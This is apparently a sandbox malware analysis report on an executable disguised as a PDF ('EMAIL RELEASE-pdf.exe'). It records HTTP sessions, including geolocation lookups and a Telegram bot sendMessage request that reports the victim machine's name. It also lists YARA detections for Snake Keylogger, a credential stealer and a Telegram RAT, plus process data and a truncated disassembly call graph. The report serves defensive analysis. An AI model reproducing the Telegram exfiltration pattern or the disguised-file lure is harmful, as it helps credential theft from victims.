                                                                                                        2024-12-17 23:30:26 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.549727172.67.177.1344435908C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-17 23:30:29 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                        Host: reallyfreegeoip.org
                                                                                                        2024-12-17 23:30:29 UTC882INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 17 Dec 2024 23:30:29 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 362
                                                                                                        Connection: close
                                                                                                        Cache-Control: max-age=31536000
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 466998
                                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=31tFAPMz%2BTWHxEoDqnxesOdiVcLzf635JKQ%2BeizKQzk1xAt%2B7HK%2Fq%2BLIgFOW8BoGQlqXpU13RFIkACsONkQwzm3CCZtBLpAUeYhiZQmoUs7F9Y9GqjmKqiXa3wto%2FH0urIbrBtBF"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f3ab3879fe3729f-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1808&rtt_var=696&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1551540&cwnd=169&unsent_bytes=0&cid=923dcc652d07dba5&ts=561&x=0"
                                                                                                        2024-12-17 23:30:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.549763172.67.177.1344435908C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-17 23:30:43 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                        Host: reallyfreegeoip.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-17 23:30:43 UTC874INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 17 Dec 2024 23:30:43 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 362
                                                                                                        Connection: close
                                                                                                        Cache-Control: max-age=31536000
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 467012
                                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yoz69ZF%2BCBjdFjFDHwrAhHpf9JDgrf2M%2Flo25LnAQ3eERQRXzWjLap0LozFIN8IuJ9peg6mBJCB6qd8jcdIXmoyB19CUT2MkwyASlppvwmzPXK6uexrHw0wDClMHd0zrZMgNngUi"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f3ab3de891f19b6-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2044&min_rtt=2025&rtt_var=798&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1338835&cwnd=170&unsent_bytes=0&cid=a16067a412293f42&ts=460&x=0"
                                                                                                        2024-12-17 23:30:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.549791149.154.167.2204435908C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-17 23:30:54 UTC334OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20and%20Time:%2018/12/2024%20/%2023:50:08%0D%0ACountry%20Name:%20%0D%0A%5B%20887849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                        Host: api.telegram.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-17 23:30:54 UTC344INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Tue, 17 Dec 2024 23:30:54 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 55
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-17 23:30:54 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                        Statistics

                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        High Level Behavior Distribution

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Target ID:0
                                                                                                        Start time:18:30:04
                                                                                                        Start date:17/12/2024
                                                                                                        Path:C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe"
                                                                                                        Imagebase:0x750000
                                                                                                        File size:1'006'592 bytes
                                                                                                        MD5 hash:6897B3D43AF4ACA3376A79D7169746DB
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:2
                                                                                                        Start time:18:30:05
                                                                                                        Start date:17/12/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe"
                                                                                                        Imagebase:0xa80000
                                                                                                        File size:45'984 bytes
                                                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4548549275.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Disassembly

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:3.8%
                                                                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                                                                          Signature Coverage:8%
                                                                                                          Total number of Nodes:2000
                                                                                                          Total number of Limit Nodes:193
                                                                                                          execution_graph 101396 751055 101401 752649 101396->101401 101411 757667 101401->101411 101405 752754 101407 75105a 101405->101407 101419 753416 59 API calls 2 library calls 101405->101419 101408 772d40 101407->101408 101465 772c44 101408->101465 101410 751064 101420 770db6 101411->101420 101413 757688 101414 770db6 Mailbox 59 API calls 101413->101414 101415 7526b7 101414->101415 101416 753582 101415->101416 101458 7535b0 101416->101458 101419->101405 101422 770dbe 101420->101422 101423 770dd8 101422->101423 101425 770ddc std::exception::exception 101422->101425 101430 77571c 101422->101430 101447 7733a1 DecodePointer 101422->101447 101423->101413 101448 77859b RaiseException 101425->101448 101427 770e06 101449 7784d1 58 API calls _free 101427->101449 101429 770e18 101429->101413 101431 775797 101430->101431 101438 775728 101430->101438 101456 7733a1 DecodePointer 101431->101456 101433 77579d 101457 778b28 58 API calls __getptd_noexit 101433->101457 101436 77575b RtlAllocateHeap 101436->101438 101446 77578f 101436->101446 101438->101436 101439 775733 101438->101439 101440 775783 101438->101440 101444 775781 101438->101444 101453 7733a1 DecodePointer 101438->101453 101439->101438 101450 77a16b 58 API calls 2 library calls 101439->101450 101451 77a1c8 58 API calls 7 library calls 101439->101451 101452 77309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101439->101452 101454 778b28 58 API calls __getptd_noexit 101440->101454 101455 778b28 58 API calls __getptd_noexit 101444->101455 101446->101422 101447->101422 101448->101427 101449->101429 101450->101439 101451->101439 101453->101438 101454->101444 101455->101446 101456->101433 101457->101446 101459 7535bd 101458->101459 101460 7535a1 101458->101460 101459->101460 101461 7535c4 RegOpenKeyExW 101459->101461 101460->101405 101461->101460 101462 7535de RegQueryValueExW 101461->101462 101463 753614 RegCloseKey 101462->101463 101464 7535ff 101462->101464 101463->101460 101464->101463 101466 772c50 type_info::_Type_info_dtor 101465->101466 101473 773217 101466->101473 101472 772c77 type_info::_Type_info_dtor 101472->101410 101490 779c0b 101473->101490 101475 772c59 101476 772c88 DecodePointer DecodePointer 101475->101476 101477 772c65 101476->101477 101478 772cb5 101476->101478 101487 772c82 101477->101487 101478->101477 101536 7787a4 59 API calls __cftoe_l 101478->101536 101480 772d18 EncodePointer EncodePointer 101480->101477 101481 772cc7 101481->101480 101482 772cec 101481->101482 101537 778864 61 API calls 2 library calls 101481->101537 101482->101477 101486 772d06 EncodePointer 101482->101486 101538 778864 61 API calls 2 library calls 101482->101538 101485 772d00 101485->101477 101485->101486 101486->101480 101539 773220 101487->101539 101491 779c2f EnterCriticalSection 101490->101491 101492 779c1c 101490->101492 101491->101475 101497 779c93 101492->101497 101494 779c22 101494->101491 101521 7730b5 58 API calls 3 library calls 101494->101521 101498 779c9f type_info::_Type_info_dtor 101497->101498 101499 779cc0 101498->101499 101500 779ca8 101498->101500 101514 779ce1 type_info::_Type_info_dtor 101499->101514 101525 77881d 58 API calls 2 library calls 101499->101525 101522 77a16b 58 API calls 2 library calls 101500->101522 101502 779cad 101523 77a1c8 58 API calls 7 library calls 101502->101523 101505 779cd5 101507 779cdc 101505->101507 101508 779ceb 101505->101508 101506 779cb4 101524 77309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101506->101524 101526 778b28 58 API calls __getptd_noexit 101507->101526 101509 779c0b __lock 58 API calls 101508->101509 101512 779cf2 101509->101512 101515 779d17 101512->101515 101516 779cff 101512->101516 101514->101494 101528 772d55 101515->101528 101527 779e2b InitializeCriticalSectionAndSpinCount 101516->101527 101519 779d0b 101534 779d33 LeaveCriticalSection _doexit 101519->101534 101522->101502 101523->101506 101525->101505 101526->101514 101527->101519 101529 772d5e RtlFreeHeap 101528->101529 101530 772d87 __dosmaperr 101528->101530 101529->101530 101531 772d73 101529->101531 101530->101519 101535 778b28 58 API calls __getptd_noexit 101531->101535 101533 772d79 GetLastError 101533->101530 101534->101514 101535->101533 101536->101481 101537->101482 101538->101485 101542 779d75 LeaveCriticalSection 101539->101542 101541 772c87 101541->101472 101542->101541 101543 777c56 101544 777c62 type_info::_Type_info_dtor 101543->101544 101580 779e08 GetStartupInfoW 101544->101580 101546 777c67 101582 778b7c GetProcessHeap 101546->101582 101548 777cbf 101549 777cca 101548->101549 101665 777da6 58 API calls 3 library calls 101548->101665 101583 779ae6 101549->101583 101552 777cd0 101553 777cdb __RTC_Initialize 101552->101553 101666 777da6 58 API calls 3 library calls 101552->101666 101604 77d5d2 101553->101604 101556 777cea 101557 777cf6 GetCommandLineW 101556->101557 101667 777da6 58 API calls 3 library calls 101556->101667 101623 784f23 GetEnvironmentStringsW 101557->101623 101560 777cf5 101560->101557 101563 777d10 101564 777d1b 101563->101564 101668 7730b5 58 API calls 3 library calls 101563->101668 101633 784d58 101564->101633 101567 777d21 101568 777d2c 101567->101568 101669 7730b5 58 API calls 3 library calls 101567->101669 101647 7730ef 101568->101647 101571 777d34 101572 777d3f __wwincmdln 101571->101572 101670 7730b5 58 API calls 3 library calls 101571->101670 101653 7547d0 101572->101653 101575 777d53 101576 777d62 101575->101576 101671 773358 58 API calls _doexit 101575->101671 101672 7730e0 58 API calls _doexit 101576->101672 101579 777d67 type_info::_Type_info_dtor 101581 779e1e 101580->101581 101581->101546 101582->101548 101673 773187 36 API calls 2 library calls 101583->101673 101585 779aeb 101674 779d3c InitializeCriticalSectionAndSpinCount __ioinit 101585->101674 101587 779af0 101588 779af4 101587->101588 101676 779d8a TlsAlloc 101587->101676 101675 779b5c 61 API calls 2 library calls 101588->101675 101591 779af9 101591->101552 101592 779b06 101592->101588 101593 779b11 101592->101593 101677 7787d5 101593->101677 101596 779b53 101685 779b5c 61 API calls 2 library calls 101596->101685 101599 779b32 101599->101596 101601 779b38 101599->101601 101600 779b58 101600->101552 101684 779a33 58 API calls 4 library calls 101601->101684 101603 779b40 GetCurrentThreadId 101603->101552 101605 77d5de type_info::_Type_info_dtor 101604->101605 101606 779c0b __lock 58 API calls 101605->101606 101607 77d5e5 101606->101607 101608 7787d5 __calloc_crt 58 API calls 101607->101608 101610 77d5f6 101608->101610 101609 77d661 GetStartupInfoW 101617 77d676 101609->101617 101618 77d7a5 101609->101618 101610->101609 101611 77d601 type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 101610->101611 101611->101556 101612 77d86d 101699 77d87d LeaveCriticalSection _doexit 101612->101699 101614 7787d5 __calloc_crt 58 API calls 101614->101617 101615 77d7f2 GetStdHandle 101615->101618 101616 77d805 GetFileType 101616->101618 101617->101614 101617->101618 101619 77d6c4 101617->101619 101618->101612 101618->101615 101618->101616 101698 779e2b InitializeCriticalSectionAndSpinCount 101618->101698 101619->101618 101620 77d6f8 GetFileType 101619->101620 101697 779e2b InitializeCriticalSectionAndSpinCount 101619->101697 101620->101619 101624 777d06 101623->101624 101625 784f34 101623->101625 101629 784b1b GetModuleFileNameW 101624->101629 101625->101625 101700 77881d 58 API calls 2 library calls 101625->101700 101627 784f5a _memmove 101628 784f70 FreeEnvironmentStringsW 101627->101628 101628->101624 101630 784b4f _wparse_cmdline 101629->101630 101632 784b8f _wparse_cmdline 101630->101632 101701 77881d 58 API calls 2 library calls 101630->101701 101632->101563 101634 784d69 101633->101634 101635 784d71 __wsetenvp 101633->101635 101634->101567 101636 7787d5 __calloc_crt 58 API calls 101635->101636 101637 784d9a __wsetenvp 101636->101637 101637->101634 101639 784df1 101637->101639 101640 7787d5 __calloc_crt 58 API calls 101637->101640 101641 784e16 101637->101641 101644 784e2d 101637->101644 101702 784607 58 API calls __cftoe_l 101637->101702 101638 772d55 _free 58 API calls 101638->101634 101639->101638 101640->101637 101643 772d55 _free 58 API calls 101641->101643 101643->101634 101703 778dc6 IsProcessorFeaturePresent 101644->101703 101646 784e39 101646->101567 101648 7730fb __IsNonwritableInCurrentImage 101647->101648 101726 77a4d1 101648->101726 101650 773119 __initterm_e 101651 772d40 __cinit 67 API calls 101650->101651 101652 773138 _doexit __IsNonwritableInCurrentImage 101650->101652 101651->101652 101652->101571 101654 7547ea 101653->101654 101664 754889 101653->101664 101655 754824 IsThemeActive 101654->101655 101729 77336c 101655->101729 101659 754850 101741 7548fd SystemParametersInfoW SystemParametersInfoW 101659->101741 101661 75485c 101742 753b3a 101661->101742 101663 754864 SystemParametersInfoW 101663->101664 101664->101575 101665->101549 101666->101553 101667->101560 101671->101576 101672->101579 101673->101585 101674->101587 101675->101591 101676->101592 101680 7787dc 101677->101680 101679 778817 101679->101596 101683 779de6 TlsSetValue 101679->101683 101680->101679 101682 7787fa 101680->101682 101686 7851f6 101680->101686 101682->101679 101682->101680 101694 77a132 Sleep 101682->101694 101683->101599 101684->101603 101685->101600 101687 785201 101686->101687 101692 78521c 101686->101692 101688 78520d 101687->101688 101687->101692 101695 778b28 58 API calls __getptd_noexit 101688->101695 101690 78522c HeapAlloc 101691 785212 101690->101691 101690->101692 101691->101680 101692->101690 101692->101691 101696 7733a1 DecodePointer 101692->101696 101694->101682 101695->101691 101696->101692 101697->101619 101698->101618 101699->101611 101700->101627 101701->101632 101702->101637 101704 778dd1 101703->101704 101709 778c59 101704->101709 101708 778dec 101708->101646 101710 778c73 _memset ___raise_securityfailure 101709->101710 101711 778c93 IsDebuggerPresent 101710->101711 101717 77a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 101711->101717 101714 778d7a 101716 77a140 GetCurrentProcess TerminateProcess 101714->101716 101715 778d57 ___raise_securityfailure 101718 77c5f6 101715->101718 101716->101708 101717->101715 101719 77c600 IsProcessorFeaturePresent 101718->101719 101720 77c5fe 101718->101720 101722 78590a 101719->101722 101720->101714 101725 7858b9 5 API calls ___raise_securityfailure 101722->101725 101724 7859ed 101724->101714 101725->101724 101727 77a4d4 EncodePointer 101726->101727 101727->101727 101728 77a4ee 101727->101728 101728->101650 101730 779c0b __lock 58 API calls 101729->101730 101731 773377 DecodePointer EncodePointer 101730->101731 101794 779d75 LeaveCriticalSection 101731->101794 101733 754849 101734 7733d4 101733->101734 101735 7733de 101734->101735 101736 7733f8 101734->101736 101735->101736 101795 778b28 58 API calls __getptd_noexit 101735->101795 101736->101659 101738 7733e8 101796 778db6 9 API calls __cftoe_l 101738->101796 101740 7733f3 101740->101659 101741->101661 101743 753b47 __ftell_nolock 101742->101743 101744 757667 59 API calls 101743->101744 101745 753b51 GetCurrentDirectoryW 101744->101745 101797 753766 101745->101797 101747 753b7a IsDebuggerPresent 101748 78d272 MessageBoxA 101747->101748 101749 753b88 101747->101749 101750 78d28c 101748->101750 101749->101750 101751 753ba5 101749->101751 101780 753c61 101749->101780 102016 757213 59 API calls Mailbox 101750->102016 101878 757285 101751->101878 101752 753c68 SetCurrentDirectoryW 101757 753c75 Mailbox 101752->101757 101756 753bc3 GetFullPathNameW 101894 757bcc 101756->101894 101757->101663 101758 78d29c 101761 78d2b2 SetCurrentDirectoryW 101758->101761 101760 753bfe 101903 76092d 101760->101903 101761->101757 101764 753c1c 101765 753c26 101764->101765 102017 7a874b AllocateAndInitializeSid CheckTokenMembership FreeSid 101764->102017 101919 753a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 101765->101919 101768 78d2cf 101768->101765 101771 78d2e0 101768->101771 102018 754706 101771->102018 101772 753c30 101774 753c43 101772->101774 101927 75434a 101772->101927 101938 7609d0 101774->101938 101777 78d2e8 102025 757de1 101777->102025 101778 753c4e 101778->101780 102015 75443a Shell_NotifyIconW _memset 101778->102015 101780->101752 101781 78d2f5 101794->101733 101795->101738 101796->101740 101798 757667 59 API calls 101797->101798 101799 75377c 101798->101799 102045 753d31 101799->102045 101801 75379a 101802 754706 61 API calls 101801->101802 101803 7537ae 101802->101803 101804 757de1 59 API calls 101803->101804 101805 7537bb 101804->101805 102059 754ddd 101805->102059 101808 7537dc Mailbox 102083 758047 101808->102083 101809 78d173 102130 7b955b 101809->102130 101812 78d192 101815 772d55 _free 58 API calls 101812->101815 101817 78d19f 101815->101817 101819 754e4a 84 API calls 101817->101819 101821 78d1a8 101819->101821 101825 753ed0 59 API calls 101821->101825 101822 757de1 59 API calls 101823 753808 101822->101823 102090 7584c0 101823->102090 101827 78d1c3 101825->101827 101826 75381a Mailbox 101828 757de1 59 API calls 101826->101828 101829 753ed0 59 API calls 101827->101829 101830 753840 101828->101830 101831 78d1df 101829->101831 101832 7584c0 69 API calls 101830->101832 101833 754706 61 API calls 101831->101833 101835 75384f Mailbox 101832->101835 101834 78d204 101833->101834 101836 753ed0 59 API calls 101834->101836 101838 757667 59 API calls 101835->101838 101837 78d210 101836->101837 101839 758047 59 API calls 101837->101839 101840 75386d 101838->101840 101841 78d21e 101839->101841 102094 753ed0 101840->102094 101843 753ed0 59 API calls 101841->101843 101847 78d22d 101843->101847 101846 753887 101846->101821 101848 753891 101846->101848 101851 758047 59 API calls 101847->101851 101849 772efd _W_store_winword 60 API calls 101848->101849 101850 75389c 101849->101850 101850->101827 101852 7538a6 101850->101852 101853 78d24f 101851->101853 101854 772efd _W_store_winword 60 API calls 101852->101854 101855 753ed0 59 API calls 101853->101855 101856 7538b1 101854->101856 101857 78d25c 101855->101857 101856->101831 101858 7538bb 101856->101858 101857->101857 101859 772efd _W_store_winword 60 API calls 101858->101859 101860 7538c6 101859->101860 101860->101847 101861 753907 101860->101861 101863 753ed0 59 API calls 101860->101863 101861->101847 101862 753914 101861->101862 102110 7592ce 101862->102110 101865 7538ea 101863->101865 101867 758047 59 API calls 101865->101867 101869 7538f8 101867->101869 101871 753ed0 59 API calls 101869->101871 101871->101861 101873 75928a 59 API calls 101875 75394f 101873->101875 101874 758ee0 60 API calls 101874->101875 101875->101873 101875->101874 101876 753ed0 59 API calls 101875->101876 101877 753995 Mailbox 101875->101877 101876->101875 101877->101747 101879 757292 __ftell_nolock 101878->101879 101880 78ea22 _memset 101879->101880 101881 7572ab 101879->101881 101883 78ea3e GetOpenFileNameW 101880->101883 103003 754750 101881->103003 101885 78ea8d 101883->101885 101887 757bcc 59 API calls 101885->101887 101889 78eaa2 101887->101889 101889->101889 101891 7572c9 103031 75686a 101891->103031 101895 757c45 101894->101895 101896 757bd8 __wsetenvp 101894->101896 101897 757d2c 59 API calls 101895->101897 101898 757c13 101896->101898 101899 757bee 101896->101899 101902 757bf6 _memmove 101897->101902 101900 758029 59 API calls 101898->101900 103300 757f27 59 API calls Mailbox 101899->103300 101900->101902 101902->101760 101904 76093a __ftell_nolock 101903->101904 103301 756d80 101904->103301 101906 76093f 101918 753c14 101906->101918 103312 76119e 89 API calls 101906->103312 101908 76094c 101908->101918 103313 763ee7 91 API calls Mailbox 101908->103313 101910 760955 101911 760959 GetFullPathNameW 101910->101911 101910->101918 101912 757bcc 59 API calls 101911->101912 101913 760985 101912->101913 101914 757bcc 59 API calls 101913->101914 101915 760992 101914->101915 101916 757bcc 59 API calls 101915->101916 101917 794cab _wcscat 101915->101917 101916->101918 101918->101758 101918->101764 101920 753ab0 LoadImageW RegisterClassExW 101919->101920 101921 78d261 101919->101921 103351 753041 7 API calls 101920->103351 103352 7547a0 LoadImageW EnumResourceNamesW 101921->103352 101924 753b34 101926 7539d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 101924->101926 101925 78d26a 101926->101772 101928 754375 _memset 101927->101928 103353 754182 101928->103353 101931 7543fa 101933 754414 Shell_NotifyIconW 101931->101933 101934 754430 Shell_NotifyIconW 101931->101934 101935 754422 101933->101935 101934->101935 103357 75407c 101935->103357 101939 794cc3 101938->101939 101953 